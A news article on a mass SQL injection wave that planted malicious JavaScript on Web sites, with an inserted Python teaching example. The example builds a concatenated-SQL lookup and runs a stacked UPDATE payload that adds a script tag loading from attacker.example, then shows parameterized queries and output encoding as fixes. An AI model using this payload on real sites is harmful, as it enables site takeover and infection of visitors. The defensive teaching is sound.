Sloppy site developers to blame for the current crop of SQL injection attacks on Web servers

Security firm Fortify Software says this week's reports of a rash of SQL injection attacks on Web sites should make software developers sit up and take notice.

"Newswire reports suggest that hundreds of thousands of Web sites have been hit by a mass SQL attack. This is symptomatic of hackers developing highly sophisticated and semi-automated attack routines," said Jacob West, Manager of Fortify’s Security Research Group.

West added that “The script or tool behind the attack uses Google to search for sites that include a file type and parameter that appear to often be susceptible to SQL injection and uses that list returned from Google to mount its attack.

“The attack uses the SQL injection vulnerability to mount a persistent cross-site scripting attack that embeds malicious JavaScript/HTML in the vulnerable application and infects all visitors to the infected site until it is explicitly identified and removed.”
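The mechanism West describes, as an added example that is not part of the original article or of Fortify's code: a lookup that concatenates a request parameter into SQL text, a stacked-statement payload that appends a script tag to every stored article body (the second stage, the persistent cross-site scripting), and the type-checked, parameterized lookup plus output encoding that close both doors. The schema, the sample rows, the payload and the attacker.example URL are constructed for the example; run_stacked is a stand-in for a database driver that accepts several statements in one call, which Python's sqlite3 execute() does not.

```python
import html
import sqlite3


# Constructed sample schema standing in for a content-managed Web site.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Welcome", "First post"), ("News", "Second post")],
    )
    conn.commit()
    return conn


def run_stacked(conn, sql):
    """Stand-in (assumption of this example) for a driver that accepts several
    ';'-separated statements in one call. sqlite3's execute() refuses stacked
    statements, so the pieces are run one by one: the first statement's rows
    are returned, the rest are executed for their side effects."""
    statements = [s for s in sql.split(";") if s.strip()]
    rows = conn.execute(statements[0]).fetchall()
    for stmt in statements[1:]:
        conn.execute(stmt)
    conn.commit()
    return rows


def vulnerable_lookup(conn, article_id):
    """Vulnerable: the request parameter is pasted into the SQL text, so
    anything after the number is parsed and executed as SQL."""
    sql = "SELECT title, body FROM articles WHERE id = " + article_id
    return run_stacked(conn, sql)


def hardened_lookup(conn, article_id):
    """Hardened: check the parameter has the type it is supposed to have, then
    bind it. The value reaches the engine as data, never as statement text."""
    try:
        article_id = int(article_id)
    except (TypeError, ValueError):
        raise ValueError("article id must be an integer")
    return conn.execute(
        "SELECT title, body FROM articles WHERE id = ?", (article_id,)
    ).fetchall()


def render_body(body):
    """Second line of defence: HTML-encode stored text on output, so a script
    tag that did reach the database is displayed as text, not executed."""
    return "<p>" + html.escape(body) + "</p>"


# Constructed payload: a valid id followed by a stacked UPDATE that appends a
# script reference to every stored article body (attacker.example is a placeholder).
PAYLOAD = (
    "1; UPDATE articles SET body = body || "
    "'<script src=\"http://attacker.example/x.js\"></script>'"
)


def demo():
    conn = make_db()
    vulnerable_lookup(conn, PAYLOAD)  # injection runs; every body is now poisoned
    poisoned = conn.execute("SELECT body FROM articles WHERE id = 2").fetchone()[0]

    clean = make_db()
    try:
        hardened_lookup(clean, PAYLOAD)  # rejected before any SQL is built
        hardened_rejected = False
    except ValueError:
        hardened_rejected = True
    untouched = clean.execute("SELECT body FROM articles WHERE id = 2").fetchone()[0]

    return {
        "poisoned_body": poisoned,
        "poisoned_rendered": render_body(poisoned),
        "hardened_rejected": hardened_rejected,
        "untouched_body": untouched,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The order of the two defences matters: binding the parameter stops the database from being written to at all, while output encoding only limits the damage once a site has already been poisoned, which is why cleaning up an infected site still requires finding and removing the injected markup.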

According to West, the current crop of SQL attacks appears to be the result of sloppy programming on the part of Web site developers.

"Although this wave of attacks targets an application vulnerability that is the result of poor programming, it is indicative of the larger problem that we in the software engineering and security fields need to provide developers with APIs that make getting security right easier, and better tools and processes to ensure that the software they build with these APIs is secure," he said.

West added “SQL injection is a straightforward problem to identify and avoid when compared with other code-level vulnerabilities, but these attacks demonstrate that some organizations building web applications today are still woefully behind the bad guys.

“The solution to this and similar problems is a software development lifecycle designed to build security into software from the ground up. Security is a critical attribute during the design, building, testing and deployment phases. Software developed without a full-lifecycle approach and the right tools to support each phase is destined to suffer security compromises like the one seen here.”